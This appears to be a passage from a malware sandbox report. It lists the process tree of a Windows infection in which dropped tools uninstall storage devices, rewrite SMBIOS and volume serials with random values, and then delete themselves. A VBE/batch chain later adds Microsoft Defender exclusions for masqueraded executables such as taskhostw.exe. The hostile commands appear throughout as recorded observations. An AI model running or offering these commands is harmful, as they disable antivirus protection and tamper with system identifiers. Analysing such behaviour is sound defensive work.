        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:408
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2900
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3000
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2580
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2924
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4840
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3764
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:3188
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 213HP-TRGT9331AB
        5⤵
        Executes dropped EXE
        
        PID:3108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:1944
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2213HP-TRGT9331RV
        5⤵
        Executes dropped EXE
        
        PID:1912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:4252
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8216HP-TRGT20080SG
        5⤵
        Executes dropped EXE
        
        PID:3156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:1816
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        Executes dropped EXE
        
        PID:432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:3980
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5216HP-TRGT20080SL
        5⤵
        Executes dropped EXE
        
        PID:1472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:956
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4220HP-TRGT30828FA
        5⤵
        Executes dropped EXE
        
        PID:3956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:1656
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6220HP-TRGT30828FU
        5⤵
        Executes dropped EXE
        
        PID:4864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:3052
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3220HP-TRGT30828DQ
        5⤵
        Executes dropped EXE
        
        PID:2040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:1960
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7220HP-TRGT30828MST
        5⤵
        Executes dropped EXE
        
        PID:3856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:1564
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        Executes dropped EXE
        
        PID:3860
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:2544
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 239HP-TRGT29782AB
        5⤵
        Executes dropped EXE
        
        PID:3380
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:4020
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3856
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2239HP-TRGT29782RV
        5⤵
        Executes dropped EXE
        
        PID:4136
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:3036
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8239HP-TRGT29782SG
        5⤵
        Executes dropped EXE
        
        PID:1668
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:408
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        Executes dropped EXE
        
        PID:376
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:2648
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5239HP-TRGT29782SL
        5⤵
        Executes dropped EXE
        
        PID:4492
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:4376
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4243HP-TRGT7763FA
        5⤵
        Executes dropped EXE
        
        PID:648
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:4920
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6243HP-TRGT7763FU
        5⤵
        Executes dropped EXE
        
        PID:4692
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:632
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3243HP-TRGT7763DQ
        5⤵
        Executes dropped EXE
        
        PID:4364
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:4532
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7243HP-TRGT7763MST
        5⤵
        Executes dropped EXE
        
        PID:5116
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:1220
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        Executes dropped EXE
        
        PID:3408
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:2768
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 259HP-TRGT28737AB
        5⤵
        Executes dropped EXE
        
        PID:4688
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:4704
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2259HP-TRGT28737RV
        5⤵
        Executes dropped EXE
        
        PID:4480
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:1904
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8259HP-TRGT28737SG
        5⤵
        Executes dropped EXE
        
        PID:1748
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:396
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        Executes dropped EXE
        
        PID:3772
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:3068
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4692
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5259HP-TRGT28737SL
        5⤵
        Executes dropped EXE
        
        PID:1548
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:2808
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3188
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4259HP-TRGT28737FA
        5⤵
        Executes dropped EXE
        
        PID:2080
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:2392
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2924
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6259HP-TRGT28737FU
        5⤵
        Executes dropped EXE
        
        PID:956
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:720
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3259HP-TRGT28737DQ
        5⤵
        Executes dropped EXE
        
        PID:5116
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:3936
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7259HP-TRGT28737MST
        5⤵
        Executes dropped EXE
        
        PID:4520
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:3572
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        Executes dropped EXE
        
        PID:624
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: NJBE-3ROT
      4⤵
      PID:4784
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:432
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: NJBE-3ROT
        5⤵
        Executes dropped EXE
        
        PID:3496
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: BDZP-PORE
      4⤵
      PID:3152
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: BDZP-PORE
        5⤵
        Executes dropped EXE
        
        PID:5016
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: KKCA-5UZ3
      4⤵
      PID:988
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: KKCA-5UZ3
        5⤵
        Executes dropped EXE
        
        PID:4328
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: HOUA-6DMC
      4⤵
      PID:2548
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: HOUA-6DMC
        5⤵
        Executes dropped EXE
        
        PID:3596
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: FRMN-91EI
      4⤵
      PID:3168
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: FRMN-91EI
        5⤵
        Executes dropped EXE
        
        PID:4696
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: CMH3-IBLR
      4⤵
      PID:3764
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3380
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: CMH3-IBLR
        5⤵
        Executes dropped EXE
        
        PID:4288
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: FEEJ-E0J4
      4⤵
      PID:2672
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: FEEJ-E0J4
        5⤵
        Executes dropped EXE
        
        PID:4904
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: NNVU-LJPS
      4⤵
      PID:4688
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: NNVU-LJPS
        5⤵
        Executes dropped EXE
        
        PID:4316
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: VZ3J-30JA
      4⤵
      PID:648
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4804
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: VZ3J-30JA
        5⤵
        Executes dropped EXE
        
        PID:2064
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 21A2-K8VR
      4⤵
      PID:3940
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 21A2-K8VR
        5⤵
        Executes dropped EXE
        
        PID:2244
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 7KF5-72O0
      4⤵
      PID:1768
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 7KF5-72O0
        5⤵
        
        PID:3068
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: E7G7-9INI
      4⤵
      PID:2604
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: E7G7-9INI
        5⤵
        
        PID:1700
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 2338-3A9B
      4⤵
      PID:2928
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 2338-3A9B
        5⤵
        
        PID:716
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: URM0-CR5E
      4⤵
      PID:2900
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: URM0-CR5E
        5⤵
        
        PID:836
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 7K6H-795A
      4⤵
      PID:4952
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: 7K6H-795A
        5⤵
        
        PID:1824
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: VCU1-98F6
      4⤵
      PID:3356
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: VCU1-98F6
        5⤵
        
        PID:1220
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 78MF-3TNF
      4⤵
      PID:4724
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 78MF-3TNF
        5⤵
        
        PID:3248
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: KNJ6-57F5
      4⤵
      PID:3688
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: KNJ6-57F5
        5⤵
        
        PID:1292
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: EHOE-H5LZ
      4⤵
      PID:3264
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: EHOE-H5LZ
        5⤵
        
        PID:2312
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: PC7L-93VV
      4⤵
      PID:1980
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: PC7L-93VV
        5⤵
        
        PID:1548
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: LHMG-NPZB
      4⤵
      PID:1828
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: LHMG-NPZB
        5⤵
        
        PID:5116
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: GOAB-GHZR
      4⤵
      PID:4776
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: GOAB-GHZR
        5⤵
        
        PID:828
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: MKDL-E4VV
      4⤵
      PID:1656
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: MKDL-E4VV
        5⤵
        
        PID:5280
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
      4⤵
      PID:3972
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
      4⤵
      PID:5128
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
      4⤵
      PID:5176
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
      4⤵
      PID:5224
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
      4⤵
      PID:5296
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
      4⤵
      PID:5344
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      PID:5380
- - C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
    "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4248
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2240
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2904
      - C:\ChainReview\sphyperRuntimedhcpSvc.exe
        
        "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:2440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\DevManView.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\taskhostw.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\RuntimeBroker.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\sihost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4520
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Np1XZoUBqP.bat"
        7⤵
        
        PID:208
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2800
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:1100
        
        C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe
        
        "C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\taskhostw.exe"
